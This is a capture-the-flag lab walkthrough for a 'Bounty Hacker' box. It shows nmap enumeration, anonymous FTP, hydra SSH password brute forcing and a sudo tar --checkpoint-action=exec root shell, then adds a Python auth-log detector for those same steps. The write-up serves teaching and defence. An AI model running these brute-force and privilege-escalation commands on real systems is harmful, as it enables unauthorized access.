You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!
Enumeration
I first ran an Nmap service scan to detect open services.
nmap -sC -sV 10.10.10.10
This returned ports 21 (FTP), 22 (SSH) and 80 (HTTP). The good thing about running -sC (default scripts) is that it identified anonymous FTP login, so we can connect via FTP.
ftp 10.10.10.10
One of the files available to us is locks.txt, which contains a list of what looks to be passwords.
Exploitation
On the webserver, we’re given a list of members of the ‘Red Dragon Syndicate’.
spike
jet
ed
edward
ein
faye
lin
We can use this list of users with the list of passwords to see if we can crack into SSH.
hydra -L users.txt -P locks.txt 10.10.10.10 ssh
We were able to get access to lin!
Privilege Escalation
Taking a look at sudo -l
User lin may run the following commands on bountyhacker:
GTFOBins has some nifty tar commands which can help escalate privileges.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
This command makes tar run /bin/sh at its first checkpoint. Because tar was started through sudo, that shell runs as root!
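The SSH password guessing and the sudo tar step above both leave entries in the target's auth log. As an added example (not part of the original write-up), this Python script flags a source IP that fails logins against several accounts and then succeeds, and any sudo invocation of tar with --checkpoint-action=exec. The log lines are constructed; the source IPs, timestamps, the /bin/tar path and the min_users threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in OpenSSH / sudo syslog format; IPs, times and the tar path are invented.
SAMPLE_LOG = """\
Jan 10 10:00:01 bountyhacker sshd[901]: Failed password for spike from 10.10.10.99 port 40001 ssh2
Jan 10 10:00:02 bountyhacker sshd[902]: Failed password for invalid user ed from 10.10.10.99 port 40002 ssh2
Jan 10 10:00:03 bountyhacker sshd[903]: Failed password for faye from 10.10.10.99 port 40003 ssh2
Jan 10 10:00:04 bountyhacker sshd[904]: Failed password for lin from 10.10.10.99 port 40004 ssh2
Jan 10 10:00:05 bountyhacker sshd[905]: Accepted password for lin from 10.10.10.99 port 40005 ssh2
Jan 10 10:02:00 bountyhacker sshd[950]: Failed password for jet from 10.10.10.50 port 41000 ssh2
Jan 10 10:03:00 bountyhacker sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port")
SUDO = re.compile(r"sudo:\s+(\S+) : .*USER=(\S+) ; COMMAND=(.*)$")
TAR_EXEC = re.compile(r"(?:^|/)tar\s.*--checkpoint-action=exec")


def analyze(log_text, min_users=3):
    """Return (guessing_then_login, sudo_tar_exec) findings from auth log text."""
    failed_users = defaultdict(set)  # source IP -> usernames that failed so far
    logins, escapes = [], []
    for line in log_text.splitlines():
        if m := FAILED.search(line):
            failed_users[m.group(2)].add(m.group(1))
        elif m := ACCEPTED.search(line):
            user, ip = m.groups()
            # Success after failures against several accounts from the same source
            if len(failed_users[ip]) >= min_users:
                logins.append((ip, user, len(failed_users[ip])))
        elif m := SUDO.search(line):
            user, target, cmd = m.groups()
            # tar told to execute a program at a checkpoint while running via sudo
            if TAR_EXEC.search(cmd):
                escapes.append((user, target, cmd))
    return logins, escapes


if __name__ == "__main__":
    logins, escapes = analyze(SAMPLE_LOG)
    print("guessing then login:", logins)
    print("sudo tar exec:", escapes)
```

On a real host the same checks would read /var/log/auth.log (Debian/Ubuntu) or the journal, and the threshold would need tuning against normal failed-login noise.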